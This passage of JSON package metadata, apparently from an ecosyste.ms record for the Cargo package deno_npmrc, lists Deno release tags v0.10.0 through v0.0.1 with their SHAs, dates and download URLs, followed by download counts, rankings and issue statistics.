1:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:30.378Z","dependent_packages_count":0,"downloads":38071,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":91.39639908485029,"dependent_repos_count":16.356966074853375,"dependent_packages_count":21.608082190690677,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":43.12048245013145},"purl":"pkg:cargo/deno_npmrc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npmrc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npmrc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npmrc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.37